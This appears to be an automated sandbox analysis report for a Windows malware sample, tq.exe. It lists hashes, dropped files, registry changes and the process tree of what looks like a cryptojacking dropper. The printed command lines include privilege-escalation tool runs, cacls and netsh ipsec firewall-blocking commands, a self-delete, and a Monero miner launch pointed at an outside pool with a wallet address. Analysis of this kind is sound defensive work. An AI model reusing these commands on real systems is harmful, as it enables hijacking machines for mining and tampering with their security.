0bd2014bb1daba436cf1168ca4de9d3784afef3a4141c2305f786da543567c15

Analysis

max time kernel
124s
max time network
138s
platform
windows10_x64
resource
win10v20210408
submitted
07-05-2021 13:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tq.exe
Size

418KB
MD5

e8450e61f061fd90d74507eb04845ecd
SHA1

f344f20c57f9cb01ea3166f3404336da1519a832
SHA256

0bd2014bb1daba436cf1168ca4de9d3784afef3a4141c2305f786da543567c15
SHA512

d4497d9c37812c9d0733ab1785e4592cabb1fd5861d8b102c8eb351f0c96b8f70be8f27ac2e817976b751cfb8fd25167376df412bde8f966ea3a195086dd1a91

Score

10^/10

persistence upx

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 2120 created 1896 2120 svchost.exe MS19.exe
Downloads MZ/PE file
Executes dropped EXE 7 IoCs

Processes:

MS19.exeMS20.exeMSSQLH.exeRunDllExe.exeRunDllExe.exex64.exewudfhosts.exe

pid process

1896 MS19.exe
2132 MS20.exe
3928 MSSQLH.exe
3496 RunDllExe.exe
1872 RunDllExe.exe
572 x64.exe
188 wudfhosts.exe
Registers new Print Monitor 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

description	pid	process	target process
PID 2120 created 1896	2120	svchost.exe	MS19.exe

pid	process
1896	MS19.exe
2132	MS20.exe
3928	MSSQLH.exe
3496	RunDllExe.exe
1872	RunDllExe.exe
572	x64.exe
188	wudfhosts.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\x64.exe	upx
C:\Users\Admin\AppData\Local\Temp\x64.exe	upx
C:\Windows\Cursors\wudfhosts.exe	upx
C:\Windows\Cursors\WUDFhosts.exe	upx

Loads dropped DLL 2 IoCs

Processes:

svchost.exe

pid process

2024
2056 svchost.exe

pid	process
2024
2056	svchost.exe

Drops file in System32 directory 6 IoCs

Processes:

svchost.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	svchost.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\Update[1].txt	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

RunDllExe.exe

description pid process target process

PID 3496 set thread context of 3336 3496 RunDllExe.exe svchost.exe

description	pid	process	target process
PID 3496 set thread context of 3336	3496	RunDllExe.exe	svchost.exe

Drops file in Windows directory 18 IoCs

Processes:

RunDllExe.exeMSSQLH.exeRunDllExe.exex64.exesvchost.exe

description	ioc	process
File created	C:\Windows\Logs\RunDllExe_New.dll	RunDllExe.exe
File created	C:\Windows\Logs\Vers.txt	MSSQLH.exe
File created	C:\Windows\Logs\RunDllExe_New.dll	RunDllExe.exe
File opened for modification	C:\Windows\Logs\RunDllExe	RunDllExe.exe
File opened for modification	C:\Windows\Cursors\WUDFhosts.exe	x64.exe
File created	C:\Windows\Cursors\WUDFhosts.exe	x64.exe
File created	C:\Windows\Logs\RunDllExe.exe	MSSQLH.exe
File created	C:\Windows\Logs\RunDllExe_New	RunDllExe.exe
File created	C:\Windows\Logs\RunDllExe_New	RunDllExe.exe
File opened for modification	C:\Windows\Logs\RunDllExe.dll	RunDllExe.exe
File created	C:\Windows\Help\active_desktop_render_New.dll	svchost.exe
File created	C:\Windows\Logs\RunDllExe.dll	MSSQLH.exe
File created	C:\Windows\MpMgSvc.dll	MSSQLH.exe
File opened for modification	C:\Windows\Logs\RunDllExe	RunDllExe.exe
File created	C:\Windows\Help\active_desktop_render.dll	x64.exe
File opened for modification	C:\Windows\Help\active_desktop_render.dll	svchost.exe
File created	C:\Windows\Logs\RunDllExe	MSSQLH.exe
File opened for modification	C:\Windows\Logs\RunDllExe.dll	RunDllExe.exe

Modifies data under HKEY_USERS 8 IoCs

Processes:

svchost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

MSSQLH.exesvchost.exe

pid	process
3928	MSSQLH.exe
3928	MSSQLH.exe
1156	svchost.exe
1156	svchost.exe
1156	svchost.exe
1156	svchost.exe
1156	svchost.exe
1156	svchost.exe
1156	svchost.exe
1156	svchost.exe
1156	svchost.exe
1156	svchost.exe

Suspicious use of AdjustPrivilegeToken 38 IoCs

Processes:

MS19.exesvchost.exeMS20.exeMSSQLH.exesvchost.exewudfhosts.exe

description	pid	process
Token: SeImpersonatePrivilege	1896	MS19.exe
Token: SeAssignPrimaryTokenPrivilege	1896	MS19.exe
Token: SeTcbPrivilege	2120	svchost.exe
Token: SeTcbPrivilege	2120	svchost.exe
Token: SeImpersonatePrivilege	2132	MS20.exe
Token: SeRestorePrivilege	3928	MSSQLH.exe
Token: SeBackupPrivilege	3928	MSSQLH.exe
Token: SeSecurityPrivilege	3928	MSSQLH.exe
Token: SeTakeOwnershipPrivilege	3928	MSSQLH.exe
Token: SeRestorePrivilege	3928	MSSQLH.exe
Token: SeBackupPrivilege	3928	MSSQLH.exe
Token: SeSecurityPrivilege	3928	MSSQLH.exe
Token: SeTakeOwnershipPrivilege	3928	MSSQLH.exe
Token: SeRestorePrivilege	3928	MSSQLH.exe
Token: SeBackupPrivilege	3928	MSSQLH.exe
Token: SeSecurityPrivilege	3928	MSSQLH.exe
Token: SeTakeOwnershipPrivilege	3928	MSSQLH.exe
Token: SeRestorePrivilege	3928	MSSQLH.exe
Token: SeBackupPrivilege	3928	MSSQLH.exe
Token: SeSecurityPrivilege	3928	MSSQLH.exe
Token: SeTakeOwnershipPrivilege	3928	MSSQLH.exe
Token: SeRestorePrivilege	3928	MSSQLH.exe
Token: SeBackupPrivilege	3928	MSSQLH.exe
Token: SeSecurityPrivilege	3928	MSSQLH.exe
Token: SeTakeOwnershipPrivilege	3928	MSSQLH.exe
Token: SeRestorePrivilege	3928	MSSQLH.exe
Token: SeBackupPrivilege	3928	MSSQLH.exe
Token: SeSecurityPrivilege	3928	MSSQLH.exe
Token: SeTakeOwnershipPrivilege	3928	MSSQLH.exe
Token: SeRestorePrivilege	3928	MSSQLH.exe
Token: SeBackupPrivilege	3928	MSSQLH.exe
Token: SeSecurityPrivilege	3928	MSSQLH.exe
Token: SeTakeOwnershipPrivilege	3928	MSSQLH.exe
Token: SeRestorePrivilege	1156	svchost.exe
Token: SeBackupPrivilege	1156	svchost.exe
Token: SeSecurityPrivilege	1156	svchost.exe
Token: SeTakeOwnershipPrivilege	1156	svchost.exe
Token: SeLockMemoryPrivilege	188	wudfhosts.exe

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

tq.exeMSSQLH.exeRunDllExe.exeRunDllExe.exex64.exesvchost.exesvchost.exe

pid process

1456 tq.exe
3928 MSSQLH.exe
3496 RunDllExe.exe
1872 RunDllExe.exe
572 x64.exe
2056 svchost.exe
1156 svchost.exe
1156 svchost.exe

pid	process
1456	tq.exe
3928	MSSQLH.exe
3496	RunDllExe.exe
1872	RunDllExe.exe
572	x64.exe
2056	svchost.exe
1156	svchost.exe
1156	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

tq.exeMSSQLH.exeRunDllExe.exeRunDllExe.exex64.exesvchost.exe

description	pid	process	target process
PID 1456 wrote to memory of 1896	1456	tq.exe	MS19.exe
PID 1456 wrote to memory of 1896	1456	tq.exe	MS19.exe
PID 1456 wrote to memory of 2132	1456	tq.exe	MS20.exe
PID 1456 wrote to memory of 2132	1456	tq.exe	MS20.exe
PID 1456 wrote to memory of 3928	1456	tq.exe	MSSQLH.exe
PID 1456 wrote to memory of 3928	1456	tq.exe	MSSQLH.exe
PID 1456 wrote to memory of 3928	1456	tq.exe	MSSQLH.exe
PID 3928 wrote to memory of 184	3928	MSSQLH.exe	cacls.exe
PID 3928 wrote to memory of 184	3928	MSSQLH.exe	cacls.exe
PID 3928 wrote to memory of 184	3928	MSSQLH.exe	cacls.exe
PID 3496 wrote to memory of 3336	3496	RunDllExe.exe	svchost.exe
PID 3496 wrote to memory of 3336	3496	RunDllExe.exe	svchost.exe
PID 3496 wrote to memory of 3336	3496	RunDllExe.exe	svchost.exe
PID 3496 wrote to memory of 3336	3496	RunDllExe.exe	svchost.exe
PID 3496 wrote to memory of 3336	3496	RunDllExe.exe	svchost.exe
PID 1872 wrote to memory of 2916	1872	RunDllExe.exe	svchost.exe
PID 1872 wrote to memory of 2916	1872	RunDllExe.exe	svchost.exe
PID 1872 wrote to memory of 2916	1872	RunDllExe.exe	svchost.exe
PID 3496 wrote to memory of 3336	3496	RunDllExe.exe	svchost.exe
PID 3496 wrote to memory of 3336	3496	RunDllExe.exe	svchost.exe
PID 3496 wrote to memory of 3336	3496	RunDllExe.exe	svchost.exe
PID 3496 wrote to memory of 3336	3496	RunDllExe.exe	svchost.exe
PID 3928 wrote to memory of 572	3928	MSSQLH.exe	x64.exe
PID 3928 wrote to memory of 572	3928	MSSQLH.exe	x64.exe
PID 3928 wrote to memory of 572	3928	MSSQLH.exe	x64.exe
PID 572 wrote to memory of 2052	572	x64.exe	netsh.exe
PID 572 wrote to memory of 2052	572	x64.exe	netsh.exe
PID 572 wrote to memory of 2052	572	x64.exe	netsh.exe
PID 572 wrote to memory of 1840	572	x64.exe	netsh.exe
PID 572 wrote to memory of 1840	572	x64.exe	netsh.exe
PID 572 wrote to memory of 1840	572	x64.exe	netsh.exe
PID 572 wrote to memory of 796	572	x64.exe	netsh.exe
PID 572 wrote to memory of 796	572	x64.exe	netsh.exe
PID 572 wrote to memory of 796	572	x64.exe	netsh.exe
PID 572 wrote to memory of 3944	572	x64.exe	netsh.exe
PID 572 wrote to memory of 3944	572	x64.exe	netsh.exe
PID 572 wrote to memory of 3944	572	x64.exe	netsh.exe
PID 572 wrote to memory of 2916	572	x64.exe	netsh.exe
PID 572 wrote to memory of 2916	572	x64.exe	netsh.exe
PID 572 wrote to memory of 2916	572	x64.exe	netsh.exe
PID 572 wrote to memory of 3960	572	x64.exe	netsh.exe
PID 572 wrote to memory of 3960	572	x64.exe	netsh.exe
PID 572 wrote to memory of 3960	572	x64.exe	netsh.exe
PID 572 wrote to memory of 828	572	x64.exe	netsh.exe
PID 572 wrote to memory of 828	572	x64.exe	netsh.exe
PID 572 wrote to memory of 828	572	x64.exe	netsh.exe
PID 572 wrote to memory of 920	572	x64.exe	netsh.exe
PID 572 wrote to memory of 920	572	x64.exe	netsh.exe
PID 572 wrote to memory of 920	572	x64.exe	netsh.exe
PID 572 wrote to memory of 1548	572	x64.exe	netsh.exe
PID 572 wrote to memory of 1548	572	x64.exe	netsh.exe
PID 572 wrote to memory of 1548	572	x64.exe	netsh.exe
PID 572 wrote to memory of 2312	572	x64.exe	netsh.exe
PID 572 wrote to memory of 2312	572	x64.exe	netsh.exe
PID 572 wrote to memory of 2312	572	x64.exe	netsh.exe
PID 572 wrote to memory of 3176	572	x64.exe	netsh.exe
PID 572 wrote to memory of 3176	572	x64.exe	netsh.exe
PID 572 wrote to memory of 3176	572	x64.exe	netsh.exe
PID 572 wrote to memory of 1896	572	x64.exe	cmd.exe
PID 572 wrote to memory of 1896	572	x64.exe	cmd.exe
PID 572 wrote to memory of 1896	572	x64.exe	cmd.exe
PID 2056 wrote to memory of 1156	2056	svchost.exe	svchost.exe
PID 2056 wrote to memory of 1156	2056	svchost.exe	svchost.exe
PID 2056 wrote to memory of 1156	2056	svchost.exe	svchost.exe

C:\Users\Admin\AppData\Local\Temp\tq.exe
"C:\Users\Admin\AppData\Local\Temp\tq.exe"
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1456

C:\Users\Admin\AppData\Local\Temp\MS19.exe
C:\Users\Admin\AppData\Local\Temp\MS19.exe -l 6666 -p C:\ProgramData\MSSQLH.exe -t *
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1896

C:\Users\Admin\AppData\Local\Temp\MS20.exe
C:\Users\Admin\AppData\Local\Temp\MS20.exe -c C:\ProgramData\MSSQLH.exe
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2132

C:\Users\Admin\AppData\Local\Temp\MSSQLH.exe
C:\Users\Admin\AppData\Local\Temp\MSSQLH.exe
2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3928

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Fonts\*.exe /e /d system
3⤵
PID:184

C:\Users\Admin\AppData\Local\Temp\x64.exe
x64.exe
3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:572

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=Block
4⤵
PID:2052

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=Filter1
4⤵
PID:1840

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
4⤵
PID:796

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
4⤵
PID:3944

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
4⤵
PID:2916

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
4⤵
PID:3960

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
4⤵
PID:828

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
4⤵
PID:920

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=FilteraAtion1 action=block
4⤵
PID:1548

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
4⤵
PID:2312

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=Block assign=y
4⤵
PID:3176

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\x64.exe"
4⤵
PID:1896

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
PID:2120

C:\Windows\Logs\RunDllExe.exe
C:\Windows\Logs\RunDllExe.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3496

C:\Windows\SysWOW64\svchost.exe
C:\Windows\system32\svchost.exe
2⤵
PID:3336

C:\Windows\Logs\RunDllExe.exe
C:\Windows\Logs\RunDllExe.exe
1⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1872

C:\Windows\SysWOW64\svchost.exe
C:\Windows\system32\svchost.exe
2⤵
PID:2916

\??\c:\windows\syswow64\svchost.exe
c:\windows\syswow64\svchost.exe -k graphicsperf_svcsgroup -s GraphicsPerf_Svcs
1⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2056

C:\Windows\SysWOW64\svchost.exe
C:\Windows\system32\svchost.exe
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1156

C:\Windows\Cursors\wudfhosts.exe
C:\Windows\Cursors\wudfhosts.exe -o xmr.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:188

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\MS19.exe
MD5
af43611695488fcabec428adc17c47ce

SHA1
62c98fbc6e57317662369ca7a6bf249ba61e3ba9

SHA256
33a7285470f1e33f1c1c0ed5644a2837694643e2c93c505912288e7c483fbf61

SHA512
a2b6eb1338d1c7541b114753dc42cb676fb4c765e2f8e118d7e612863c6ccb0b1588902043f15531b43501d2c8f4325a127f400b8c3176ae07ff463d6e8d2778

Download Submit
C:\Users\Admin\AppData\Local\Temp\MS19.exe
MD5
af43611695488fcabec428adc17c47ce

SHA1
62c98fbc6e57317662369ca7a6bf249ba61e3ba9

SHA256
33a7285470f1e33f1c1c0ed5644a2837694643e2c93c505912288e7c483fbf61

SHA512
a2b6eb1338d1c7541b114753dc42cb676fb4c765e2f8e118d7e612863c6ccb0b1588902043f15531b43501d2c8f4325a127f400b8c3176ae07ff463d6e8d2778

Download Submit
C:\Users\Admin\AppData\Local\Temp\MS20.exe
MD5
262fa5258c0bbd68221eed7226c58cd3

SHA1
0d8f0d3054f9b7c315bb9dc904258c755c39e379

SHA256
b7f22e9af63211806b1af562cd32868f8987451f40d392cc777aaba703a6b933

SHA512
a15a572fbe4d893211358b35ab1fa2b328985f717806cfaeae28946f1f3461c7d11e6cfdd135650189c45ccbd7252c7c9948043a3bde510dc0ee5b5a70690f55

Download Submit
C:\Users\Admin\AppData\Local\Temp\MS20.exe
MD5
262fa5258c0bbd68221eed7226c58cd3

SHA1
0d8f0d3054f9b7c315bb9dc904258c755c39e379

SHA256
b7f22e9af63211806b1af562cd32868f8987451f40d392cc777aaba703a6b933

SHA512
a15a572fbe4d893211358b35ab1fa2b328985f717806cfaeae28946f1f3461c7d11e6cfdd135650189c45ccbd7252c7c9948043a3bde510dc0ee5b5a70690f55

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSSQLH.exe
MD5
4f824985f3aa38c89d6ce76e87f3f1c9

SHA1
8f5c01ef6f5f3aa1b470ad8bb75d0822802b85b5

SHA256
dc9c54d7d9be92653b727c6a2b1537c0233c99a132595ec4ce651578b1bff1c4

SHA512
1cf5860a03b76a5e1bcf49160a71fea967aff39215fc2625ebf323ad454afb967a0885670ffb0fe104f5eac93ba9ec61f482bff69436844a89d3f826ae6e4ed3

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSSQLH.exe
MD5
4f824985f3aa38c89d6ce76e87f3f1c9

SHA1
8f5c01ef6f5f3aa1b470ad8bb75d0822802b85b5

SHA256
dc9c54d7d9be92653b727c6a2b1537c0233c99a132595ec4ce651578b1bff1c4

SHA512
1cf5860a03b76a5e1bcf49160a71fea967aff39215fc2625ebf323ad454afb967a0885670ffb0fe104f5eac93ba9ec61f482bff69436844a89d3f826ae6e4ed3

Download Submit
C:\Users\Admin\AppData\Local\Temp\x64.exe
MD5
1fc1c860e86a8fbc2021d2567d62f703

SHA1
42ea2c9f4548614574dff36e019ae1cbc68b54e3

SHA256
76005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306

SHA512
fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c

Download Submit
C:\Users\Admin\AppData\Local\Temp\x64.exe
MD5
1fc1c860e86a8fbc2021d2567d62f703

SHA1
42ea2c9f4548614574dff36e019ae1cbc68b54e3

SHA256
76005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306

SHA512
fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c

Download Submit
C:\Windows\Cursors\WUDFhosts.exe
MD5
4a72e30c0a582b082030adfd8345014f

SHA1
2f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353

SHA256
e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976

SHA512
8a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798

Download Submit
C:\Windows\Cursors\wudfhosts.exe
MD5
4a72e30c0a582b082030adfd8345014f

SHA1
2f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353

SHA256
e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976

SHA512
8a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798

Download Submit
C:\Windows\Logs\RunDllExe
MD5
bbbd6879022d46836d928cd270c92956

SHA1
8f61cc478b4249216c9c9fe52a79f895bfc71b51

SHA256
2eed3384b4f76dd6bd8b42f801af781c7e975d0ce88d590790bc74e4e6e87dd8

SHA512
757fbade573c3bd10be86908b5b21dc352898aa90fedd9efddefb14d4e81c4c6f6f8d21c9d17757efca26abe4b28fdf70f3e60aa3b8842327fcf06833bfcc637

Download Submit
C:\Windows\Logs\RunDllExe
MD5
b2ba3562bf2339fa7a86720ed8c06867

SHA1
ab98e9f57bcc115e0f2c31de6ae29ff94354be39

SHA256
e19c78f98e76e3efe7971268a3835bb0dd1e8d64aca6f7babf1e398fd3223e26

SHA512
6bd6b5eb1969a6d0eacbc69e84e5152c3c3f17958cc662a5115b2aefae8a98d79813dafe66e81df350bf5027a55abdf9e36022b90fa8f1d93fe340b1b1673e5b

Download Submit
C:\Windows\Logs\RunDllExe.dll
MD5
c68ec95a352a1ae97b9688794880bef2

SHA1
cd98f4986f37b562dd4d48547b156a4c740959d4

SHA256
7e0239f760a17e27702b2cbcb54f8d675a4da15ced8f60e6cb62fe07fc87ee9b

SHA512
3301864fe277fc043afb29ad9d4420628ce1755f388b63fd1762718e72c1d70c6845da3c7326bfe3af429bf619d86e329f9de2f33569c8d933ef59a7f591fa96

Download Submit
C:\Windows\Logs\RunDllExe.dll
MD5
66299769f3f96cf1a860b5b64f4df173

SHA1
2738326e2d3a2a8dca7f34a10615686416f11634

SHA256
cc292d3e2f6aa009e2bf78819f098fd35cd0111a6bae8cb987bfba9dc507fd9e

SHA512
1d7281a3db16277d6bd641992dad386fbe21d616ffe195452d2773f951c0abab2db4b26cfd5f4e2ad4d3251d8a82f74d1e552086dadcea57f871e88c9407b712

Download Submit
C:\Windows\Logs\RunDllExe.exe
MD5
645564cf1c80e047a6e90ac0f2d6a6b7

SHA1
35e4b5e065b90fe5b1713e5a4645875f023b6a18

SHA256
6f3a1b04d5398967356e42fb0245e26fb2d15c5e03db2650e225c6fbe9f6cef9

SHA512
e4ce9ad7f83c84932b30641937c1b9fc9c2dbb647fa05743f8ec5f01b66a7813441b410166e181b432fc2ca47c7edbb94000bd4d389c53961c2a100f319a0c21

Download Submit
C:\Windows\Logs\RunDllExe.exe
MD5
645564cf1c80e047a6e90ac0f2d6a6b7

SHA1
35e4b5e065b90fe5b1713e5a4645875f023b6a18

SHA256
6f3a1b04d5398967356e42fb0245e26fb2d15c5e03db2650e225c6fbe9f6cef9

SHA512
e4ce9ad7f83c84932b30641937c1b9fc9c2dbb647fa05743f8ec5f01b66a7813441b410166e181b432fc2ca47c7edbb94000bd4d389c53961c2a100f319a0c21

Download Submit
C:\Windows\Logs\RunDllExe.exe
MD5
645564cf1c80e047a6e90ac0f2d6a6b7

SHA1
35e4b5e065b90fe5b1713e5a4645875f023b6a18

SHA256
6f3a1b04d5398967356e42fb0245e26fb2d15c5e03db2650e225c6fbe9f6cef9

SHA512
e4ce9ad7f83c84932b30641937c1b9fc9c2dbb647fa05743f8ec5f01b66a7813441b410166e181b432fc2ca47c7edbb94000bd4d389c53961c2a100f319a0c21

Download Submit
\??\c:\windows\help\active_desktop_render.dll
MD5
14e2b194b652d4fd912404775a6ae898

SHA1
e93f529bb61e12c41426cb2b86176bf0af387c09

SHA256
24ca5f0220c6bbcb081de1cd4e4115bb026cd45dbe34fc462a40b241b026d66c

SHA512
b2ee0b06da1a42c04ef54e36f4a66720698e1c2d58545854d0989ae805d00e760b8bc8815ab00dd8be208f7816ed4249855c9fa506427c1f89a3dfb309c734d6

Download Submit
\Windows\Help\active_desktop_render.dll
MD5
14e2b194b652d4fd912404775a6ae898

SHA1
e93f529bb61e12c41426cb2b86176bf0af387c09

SHA256
24ca5f0220c6bbcb081de1cd4e4115bb026cd45dbe34fc462a40b241b026d66c

SHA512
b2ee0b06da1a42c04ef54e36f4a66720698e1c2d58545854d0989ae805d00e760b8bc8815ab00dd8be208f7816ed4249855c9fa506427c1f89a3dfb309c734d6

Download Submit
\Windows\Logs\RunDllExe.dll
MD5
c02d9300deea8aaa42bf5e9c56ddcf29

SHA1
4c547bab0a92ba6fe77a8bfcef56faf5f1a0ad89

SHA256
54dd6ca2fab1eab858fa8d06fa095a943d6d1ff601c71a4c6af5e9061019f9d5

SHA512
c2537d3bf63bf67ac0e844fc65285bcd444896201fd14add9bef7bab054eb93269248ecfa752268e3f692bb8ea3bc8d861e40f4ba5f63b5428f8f75a204315e1

Download Submit
memory/184-127-0x0000000000000000-mapping.dmp

Download
memory/188-169-0x0000013626F60000-0x0000013626F70000-memory.dmp

Filesize
64KB

Download
memory/188-171-0x0000013626F80000-0x0000013626F90000-memory.dmp

Filesize
64KB

Download
memory/188-170-0x0000013626F70000-0x0000013626F80000-memory.dmp

Filesize
64KB

Download
memory/188-166-0x0000000000000000-mapping.dmp

Download
memory/188-168-0x0000013626F40000-0x0000013626F50000-memory.dmp

Filesize
64KB

Download
memory/572-140-0x0000000000000000-mapping.dmp

Download
memory/796-145-0x0000000000000000-mapping.dmp

Download
memory/828-149-0x0000000000000000-mapping.dmp

Download
memory/920-150-0x0000000000000000-mapping.dmp

Download
memory/1156-157-0x0000000010000000-0x000000001010C000-memory.dmp

Filesize
1.0MB

Download
memory/1156-161-0x0000000000000000-mapping.dmp

Download
memory/1156-160-0x0000000010000000-0x000000001010C000-memory.dmp

Filesize
1.0MB

Download
memory/1156-159-0x0000000010000000-0x000000001010C000-memory.dmp

Filesize
1.0MB

Download
memory/1156-158-0x0000000010000000-0x000000001010C000-memory.dmp

Filesize
1.0MB

Download
memory/1156-164-0x0000000010000000-0x000000001010C000-memory.dmp

Filesize
1.0MB

Download
memory/1548-151-0x0000000000000000-mapping.dmp

Download
memory/1840-144-0x0000000000000000-mapping.dmp

Download
memory/1896-156-0x0000000000000000-mapping.dmp

Download
memory/1896-114-0x0000000000000000-mapping.dmp

Download
memory/2052-143-0x0000000000000000-mapping.dmp

Download
memory/2132-117-0x0000000000000000-mapping.dmp

Download
memory/2312-152-0x0000000000000000-mapping.dmp

Download
memory/2916-147-0x0000000000000000-mapping.dmp

Download
memory/3176-153-0x0000000000000000-mapping.dmp

Download
memory/3336-139-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/3336-134-0x00000000004054EC-mapping.dmp

Download
memory/3336-129-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/3336-132-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/3336-128-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
